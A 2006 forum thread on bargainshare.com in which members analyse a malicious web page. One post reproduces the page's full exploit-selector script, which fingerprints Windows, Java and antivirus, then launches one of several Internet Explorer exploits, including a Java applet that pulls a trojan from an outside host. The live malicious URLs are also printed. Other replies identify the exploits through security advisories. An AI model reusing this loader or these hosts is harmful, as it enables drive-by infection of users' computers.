bargainshare.com > Need help identifying exploit

garsh

7-24-06, 6:39am

Some loser posted a link to a website that appears to run some kind of browser exploit.
I was hoping somebody here could help me track this down.
I'd like to know what browsers it works against, and what it attempts to do.

Here's the HTML code that it runs:

CODE

<HTML xmlns:IE>
<TITLE>Gallery</TITLE>
    <HEAD>
         <STYLE type='text/css'>
            IE\:clientCaps {behavior:url(#default#clientcaps)}
         </STYLE>
    </HEAD>
<BODY>

<CENTER><H1></H1></CENTER>

<IFRAME name="StatPage" width=5 height=5 style="display:none"></IFRAME>
<IFRAME name="PageContainer" width=5 height=5 style="display:none"></IFRAME>
<DIV id="ObjectContainer"></DIV>
<IE:clientCaps ID="oClientCaps" />
<script type="text/javascript" language="javascript">

function GetVersion(CLSID)
   {
            if (oClientCaps.isComponentInstalled(CLSID,"ComponentID"))
               {return oClientCaps.getComponentVersion(CLSID,"ComponentID").split(",");}
            else
               {return Array(0,0,0,0);}
   }

function Get_Win_Version(IE_vers)
   {
     if (IE_vers.indexOf('Windows 95') != -1) return "95"
     else if (IE_vers.indexOf('Windows NT 4') != -1) return "NT"
     else if (IE_vers.indexOf('Win 9x 4.9') != -1) return "ME"
     else if (IE_vers.indexOf('Windows 98') != -1) return "98"
     else if (IE_vers.indexOf('Windows NT 5.0') != -1) return "2K"
     else if (IE_vers.indexOf('Windows NT 5.1') != -1) return "XP"
     else if (IE_vers.indexOf('Windows NT 5.2') != -1) return "2K3"
   }

function Run_BOF()
   {
    self.focus();
    for (i=1; i <=4; i++)
    {
        document.writeln('<iframe width=1 height=1 border=0 frameborder=0 src="pluginst.htm"></iframe>');
    }
    document.writeln('<iframe width=1 height=1 border=0 frameborder=0 src="ie0601d.htm"></iframe>');
   }

var CGI_Script="http://196.regvista.com/cgi-bin/ie0601.cgi";

if (navigator.appName=="Microsoft Internet Explorer")
   {
      Click_Request=CGI_Script+"?click";
      var InetPath=document.location.href;
      j=InetPath.lastIndexOf('/');
      InetPath=InetPath.slice(0,j);

      var ExploitNumber=1;
      var IEversion=navigator.appVersion;
      var IEplatform=navigator.platform;
      if (IEplatform.search("Win32") != -1)
      {
         var WinOS=Get_Win_Version(IEversion);
         FullVersion=clientInformation.appMinorVersion;
         PatchList=FullVersion.split(";");
         for (var i=0; i < PatchList.length; i++)
         {
           ServicePack=PatchList[i];
           j=ServicePack.indexOf('SP');
           if (j != -1)
           {
              ServicePack=ServicePack.substr(j);
              Click_Request=Click_Request+'&'+ServicePack;
           }
         }
         StatPage.location=Click_Request;
         var JVM_vers  = GetVersion("{08B0E5C0-4FCB-11CF-AAA5-00401C608500}");
         var IE_vers   = GetVersion("{89820200-ECBD-11CF-8B85-00AA005B4383}");
         fNortonAV=0; fMcAfee=0; XP_SP2_patched=0;
         try
         {
           var oNortonAV=new ActiveXObject("NAVCfgWizDll.NAVCfgWizMgr"); //Norton Antivirus Config Wizard initialization
           fNortonAV=1;
         }
         catch(e){}
         try
         {
           var oMcAfee=new ActiveXObject("McGDMgr.DwnldGroupMgr"); // McAfee Security Download Control initialization
           fMcAfee=1;
         }
         catch(e){}

         switch (WinOS)
         {
             case "2K":
                       if ((JVM_vers[0]!=0)&&(JVM_vers[2]<3810))
                       {  ExploitNumber=1;  }
                       else                                // if JVM = 5.0.3810.0 or higher
                       {
                          if ((fNortonAV==0)&&(fMcAfee==0))
                          { ExploitNumber=3; }
                          else
                          { ExploitNumber=2; }
                       }
                       break;
             case "2K3":
                          if ((fNortonAV==0)&&(fMcAfee==0))
                          { ExploitNumber=3; }
                          else
                          { ExploitNumber=4; }
                       break;
             case "XP":

                            if ((JVM_vers[0]!=0)&&(JVM_vers[2]<3810))
                            {  ExploitNumber=1;  }
                            else                                // if JVM = 5.0.3810.0 or higher
                            {
                               for (var i=0; i < PatchList.length; i++)
                               {
                                  if (PatchList[i]=="SP2")
                                  {  XP_SP2_patched=1; }

                               }
                               if (XP_SP2_patched==0)
                               {
                                  if ((fNortonAV==0)&&(fMcAfee==0))
                                  { ExploitNumber=3; }
                                  else
                                  { ExploitNumber=5; }
                               }
                               else
                               {
                                  if ((fNortonAV==0)&&(fMcAfee==0))
                                  { ExploitNumber=5; }
                                  else
                                  { ExploitNumber=5; }
                               }
                            }
                       break;
             default:
                       if ((JVM_vers[0]!=0)&&(JVM_vers[2]<3810))
                       {  ExploitNumber=1;  }
                       else
                       {  ExploitNumber=2;  }            // if JVM = 5.0.3810.0 or higher

                       break;
         }
         // launching exploit which number is depends on Windows and IE versions

         switch (ExploitNumber)
         {
             case  1:
                       Trojan_Path=CGI_Script+"?exploit=MS03-11";
                       ObjectContainer.innerHTML='<applet archive="'+InetPath+'/'+'ie0601a.jar" codebase="'+InetPath+'" code="TakePrivileges.class" width=1  height=1><param name="ModulePath" value="'+Trojan_Path+'"></applet>';
                       break;
             case  2:
                       CHM_base='//ie0601b.chm'+'::'+'/main.htm';
                       Protocol=unescape("%6ds-i%74s:%6dh%74%6dl:");
Init_String=Protocol+'file://'+'C:\\MAIN.MHT!'+InetPath+CHM_base;
                       oMSITS=document.createElement("<OBJECT data='"+Init_String+"' type='text/x-scriptlet'></OBJECT>");
                       document.body.appendChild(oMSITS);
                       document.title="Loaded !";
                       break;
             case  3:
window.open("ie0601c.htm","Info","left=2000,top=2000,screenX=2000,screenY=2000,width=50,height=50,scrollbars=1
,menubar=0,titlebar=0,toolbar=0,status=0");
self.focus();
                       break;
             case  4:
                       setTimeout('Run_BOF()',2000);
                       break;
             case  5:
                       PageContainer.location="0day.htm";
                       break;
             default:
                       break;
          }

      }
   }
   else
   {
        if (navigator.appName == "Netscape")
          {
            document.write('<IFRAME src="ff.html" width=5 height=5 style="display:none"></IFRAME>');
          }
       StatPage.location=CGI_Script+"?click";
   }

</script>
</BODY>
</HTML>

BlueTDimly

7-24-06, 6:48am

It's nice that they enumerate all the exploits for you

Did you download the source of ff.html or 0day.htm in a safe browser?

Looks like "Exploit 2" may correspond to this virus:
http://www.trendmicro.com/vinfo/virusencyc...5FCODEBASE%2EBB

BlueTDimly

7-24-06, 6:49am

I tried downloading ff.html simply by telnet to port 80, and I got a 404. I'll try installing lynx and seeing if I can get some of these other files.

BlueTDimly

7-24-06, 6:50am

Here's another reference to the same/similar hijack code on bugtraq:

http://www.bugtraq.ru/cgi-bin/forum.mcgi?t...=8&m=132407

NARC

7-24-06, 6:53am

ie0601a.jar pops up in a bunch of google results....

garsh

7-24-06, 6:55am

QUOTE(BlueTDimly @ 7-24-06, 10:48am)

Did you download the source of ff.html or 0day.htm in a safe browser?

I've been using wget to grab these pages.

But I had already clicked on the link originally.

I guess I'll do a Windows Restore and then run a virus check.

Monga

7-24-06, 8:46am

was it a link from here in B$? would you mind sharing what the link was so I know if I also clicked on it?
TIA

garsh

7-24-06, 9:12am

QUOTE(Monga @ 7-24-06, 12:46pm)

was it a link from here in B$? would you mind sharing what the link was so I know if I also clicked on it?

It was posted here in BS at 6:21am EST in General Discussion.
I removed it before 7am EST.

The link was: ~http://pu-blocker.com/ (DO NOT C&P THIS LINK, OR MALWARE WILL BE INSTALLED!)

That link redirects to: ~http://196.regvista.com/index.php?ref=f1 (DO NOT C&P THIS LINK, OR MALWARE WILL BE INSTALLED!)

Which contains some obfuscated javascript. Here is the javascript code, with the payload removed.
Running this code produced the document given in the original post of this thread:

CODE

Monga

7-24-06, 3:47pm

but what was it allegedly for? I hope I didn't click on it!!

BlueTDimly

7-24-06, 4:36pm

I've identified a couple of the exploits so far.

exploit 1 - MS Java VM
http://www.microsoft.com/technet/security/...n/MS03-011.mspx

exploit 2 - CHM Codebase_BB - MSOE Exploit
http://www.trendmicro.com/vinfo/virusencyc...5FCODEBASE%2EBB

Also, a google search for the site (196.regvista.com) turned up some interesting results:
http://www.google.com/search?hl=en&hs=...regvista.com%22